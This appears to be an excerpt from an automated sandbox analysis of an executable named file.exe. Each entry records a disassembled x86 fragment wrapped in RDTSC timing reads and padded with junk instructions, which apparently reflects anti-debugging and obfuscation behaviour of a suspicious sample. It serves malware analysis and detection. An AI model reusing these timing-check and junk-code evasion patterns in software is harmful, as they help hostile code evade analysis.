                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87ED4B second address: 87EDAC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ebp 0x0000000c call 00007F57D4F134D8h 0x00000011 pop ebp 0x00000012 mov dword ptr [esp+04h], ebp 0x00000016 add dword ptr [esp+04h], 00000017h 0x0000001e inc ebp 0x0000001f push ebp 0x00000020 ret 0x00000021 pop ebp 0x00000022 ret 0x00000023 push 00000000h 0x00000025 mov dword ptr [ebp+122D19F0h], ebx 0x0000002b mov ebx, dword ptr [ebp+122D2B58h] 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push edi 0x00000036 call 00007F57D4F134D8h 0x0000003b pop edi 0x0000003c mov dword ptr [esp+04h], edi 0x00000040 add dword ptr [esp+04h], 00000016h 0x00000048 inc edi 0x00000049 push edi 0x0000004a ret 0x0000004b pop edi 0x0000004c ret 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 jbe 00007F57D4F134D8h 0x00000056 pushad 0x00000057 popad 0x00000058 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87DF4E second address: 87DF61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F57D451A1BFh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87EDAC second address: 87EDB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F57D4F134D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87FDB6 second address: 87FDFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F57D451A1B6h 0x0000000a popad 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f mov di, 03D4h 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push eax 0x00000018 call 00007F57D451A1B8h 0x0000001d pop eax 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 add dword ptr [esp+04h], 00000019h 0x0000002a inc eax 0x0000002b push eax 0x0000002c ret 0x0000002d pop eax 0x0000002e ret 0x0000002f xor bl, FFFFFFF2h 0x00000032 push 00000000h 0x00000034 sub dword ptr [ebp+122D1A74h], ecx 0x0000003a xchg eax, esi 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edi 0x0000003f pop edi 0x00000040 pop eax 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87FDFE second address: 87FE0C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87F037 second address: 87F060 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007F57D451A1BCh 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007F57D451A1BDh 0x00000013 push eax 0x00000014 push edx 0x00000015 jnc 00007F57D451A1B6h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 880045 second address: 88004F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F57D4F134D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 880F42 second address: 880F46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 880F46 second address: 880F4C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 881F99 second address: 881FBC instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F57D451A1BCh 0x00000008 jo 00007F57D451A1B6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F57D451A1C0h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 883EBB second address: 883EC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 883EC1 second address: 883EC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 882F24 second address: 882F28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 883EC8 second address: 883ED6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 882F28 second address: 882F2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 883ED6 second address: 883EDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 882F2E second address: 882F57 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F57D4F134E0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c jmp 00007F57D4F134DCh 0x00000011 pop eax 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 883EDA second address: 883EE0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 883031 second address: 883037 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 888082 second address: 888088 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 888088 second address: 88808C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88931C second address: 88933E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F57D451A1C8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88933E second address: 889344 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88DA0D second address: 88DA13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88DA13 second address: 88DA2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F57D4F134E7h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88DA2F second address: 88DA38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88DA38 second address: 88DA49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jne 00007F57D4F134D6h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88D16C second address: 88D18E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F57D451A1C9h 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88D2DC second address: 88D2E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88D2E2 second address: 88D2E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88D2E6 second address: 88D30E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F57D4F134E9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c jnc 00007F57D4F134D6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88D30E second address: 88D313 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88D313 second address: 88D31C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88D31C second address: 88D322 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 891A7E second address: 891A85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 891C1A second address: 891C1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89A2D7 second address: 89A2E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007F57D4F134D6h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 898E32 second address: 898E6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b jmp 00007F57D451A1C2h 0x00000010 jmp 00007F57D451A1C9h 0x00000015 jnp 00007F57D451A1B6h 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 898E6F second address: 898E75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 898E75 second address: 898E79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 898E79 second address: 898E9C instructions: 0x00000000 rdtsc 0x00000002 jl 00007F57D4F134D6h 0x00000008 jmp 00007F57D4F134E4h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push esi 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 898E9C second address: 898EA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 899753 second address: 899759 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 899759 second address: 89976D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F57D451A1C0h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 899BAA second address: 899BDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 pop eax 0x00000008 pop esi 0x00000009 pushad 0x0000000a jns 00007F57D4F134D6h 0x00000010 jns 00007F57D4F134D6h 0x00000016 push eax 0x00000017 pop eax 0x00000018 popad 0x00000019 popad 0x0000001a pushad 0x0000001b jmp 00007F57D4F134DBh 0x00000020 jg 00007F57D4F134D8h 0x00000026 push ebx 0x00000027 pop ebx 0x00000028 push eax 0x00000029 push edx 0x0000002a push ebx 0x0000002b pop ebx 0x0000002c push eax 0x0000002d pop eax 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 899FFC second address: 89A00E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F57D451A1BAh 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89A00E second address: 89A012 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A28BC second address: 8A28C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A28C8 second address: 8A28CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A28CC second address: 8A28E7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F57D451A1C2h 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A1760 second address: 8A1777 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F57D4F134E3h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A1777 second address: 8A1781 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F57D451A1B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A1925 second address: 8A1929 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A1929 second address: 8A192F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A1BD5 second address: 8A1BF4 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F57D4F134E9h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A1BF4 second address: 8A1BF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A126D second address: 8A12A4 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F57D4F134E2h 0x00000008 jno 00007F57D4F134D6h 0x0000000e jns 00007F57D4F134D6h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 jmp 00007F57D4F134E2h 0x0000001c push eax 0x0000001d push edx 0x0000001e jo 00007F57D4F134D6h 0x00000024 je 00007F57D4F134D6h 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A12A4 second address: 8A12E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F57D451A1C6h 0x00000007 jmp 00007F57D451A1C4h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F57D451A1BCh 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A2277 second address: 8A227D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A227D second address: 8A2283 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A2283 second address: 8A228E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F57D4F134D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A2554 second address: 8A2558 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A5BFB second address: 8A5BFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A5BFF second address: 8A5C2B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F57D451A1C6h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F57D451A1BDh 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A90BF second address: 8A90C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A90C3 second address: 8A90F7 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F57D451A1B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a ja 00007F57D451A1D0h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 jmp 00007F57D451A1C8h 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jp 00007F57D451A1B6h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A90F7 second address: 8A910D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F57D4F134DCh 0x00000007 jbe 00007F57D4F134D6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A910D second address: 8A9114 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 871E4B second address: 871E4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 871E4F second address: 871E6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F57D451A1B8h 0x0000000c popad 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jo 00007F57D451A1B6h 0x0000001a push edx 0x0000001b pop edx 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 871FB7 second address: 871FD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F57D4F134E9h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87236D second address: 87237A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 872A8E second address: 872A98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F57D4F134D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 872B42 second address: 872BB4 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F57D451A1C4h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b sub edi, 595A8B00h 0x00000011 lea eax, dword ptr [ebp+1248364Ch] 0x00000017 push 00000000h 0x00000019 push eax 0x0000001a call 00007F57D451A1B8h 0x0000001f pop eax 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 add dword ptr [esp+04h], 0000001Ch 0x0000002c inc eax 0x0000002d push eax 0x0000002e ret 0x0000002f pop eax 0x00000030 ret 0x00000031 clc 0x00000032 jng 00007F57D451A1BCh 0x00000038 mov edi, dword ptr [ebp+1245D66Fh] 0x0000003e nop 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007F57D451A1C7h 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 872BB4 second address: 872BBA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 872BBA second address: 872BC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F57D451A1B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 872BC5 second address: 872BE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F57D4F134E8h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 872BE8 second address: 872C28 instructions: 0x00000000 rdtsc 0x00000002 je 00007F57D451A1B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b nop 0x0000000c mov dx, B75Fh 0x00000010 lea eax, dword ptr [ebp+12483608h] 0x00000016 push 00000000h 0x00000018 push eax 0x00000019 call 00007F57D451A1B8h 0x0000001e pop eax 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 add dword ptr [esp+04h], 00000016h 0x0000002b inc eax 0x0000002c push eax 0x0000002d ret 0x0000002e pop eax 0x0000002f ret 0x00000030 mov dword ptr [ebp+1244C90Fh], ecx 0x00000036 push eax 0x00000037 pushad 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 872C28 second address: 872C2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 872C2C second address: 852B52 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F57D451A1C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F57D451A1BFh 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007F57D451A1B8h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 00000014h 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c mov edx, esi 0x0000002e call dword ptr [ebp+122D24CAh] 0x00000034 jnl 00007F57D451A1C6h 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d push ebx 0x0000003e pop ebx 0x0000003f pushad 0x00000040 popad 0x00000041 popad 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 852B52 second address: 852B57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A966A second address: 8A9679 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A9679 second address: 8A967F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A9804 second address: 8A980A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A9C05 second address: 8A9C32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F57D4F134D6h 0x0000000a jmp 00007F57D4F134DBh 0x0000000f popad 0x00000010 push edi 0x00000011 jmp 00007F57D4F134E5h 0x00000016 pop edi 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A9C32 second address: 8A9C47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F57D451A1B6h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d jbe 00007F57D451A1B6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A9C47 second address: 8A9C4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AE8CC second address: 8AE8D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AEF38 second address: 8AEF3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AF1E7 second address: 8AF1FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F57D451A1C2h 0x00000009 rdtsc
